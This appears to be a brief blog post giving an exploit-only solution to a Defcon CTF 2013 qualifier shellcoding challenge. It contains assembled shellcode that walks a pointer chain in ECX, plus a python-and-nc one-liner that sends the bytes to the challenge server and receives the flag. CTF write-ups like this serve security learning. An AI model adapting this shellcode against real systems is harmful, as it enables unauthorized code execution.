Category : Pwnable (\xff\xe4\xcc)
(empty) |
Summary : short shellcoding, reuse pointer in ecx
/* 00A21E80 8B09 MOV ECX,DWORD PTR DS:[ECX] 00A21E82 8D41 05 LEA EAX,DWORD PTR DS:[ECX+5] 00A21E85 66:8138 4141 CMP WORD PTR DS:[EAX],4141 00A21E8A ^75 F4 JNZ SHORT 00A21E80 00A21E8C C3 RETN */ root@ubuntu:~# (python -c 'print "\x8b\x09\x8d\x41\x05\x66\x81\x38\x41\x41\x75\xf4\xc3"')| nc linked2.shallweplayaga.me 22222 List built. Send me your shellcode. Max size: 16 AAAThe key is: Who says ESP isn't general purpose!?!? |
'CTF > 2013' 카테고리의 다른 글
| Defcon CTF 2013 Qual chal exploits (0) | 2013.07.07 |
|---|---|
| Defcon CTF 2013 Qual - shellcode4 (Exploit only) (0) | 2013.07.07 |
| Defcon CTF 2013 Qual - shellcode2 (Exploit only) (0) | 2013.07.07 |
| Defcon CTF 2013 Qual - pwnable3 (Exploit only) (0) | 2013.07.07 |
| Plaid CTF 2013 Write up collection (0) | 2013.04.23 |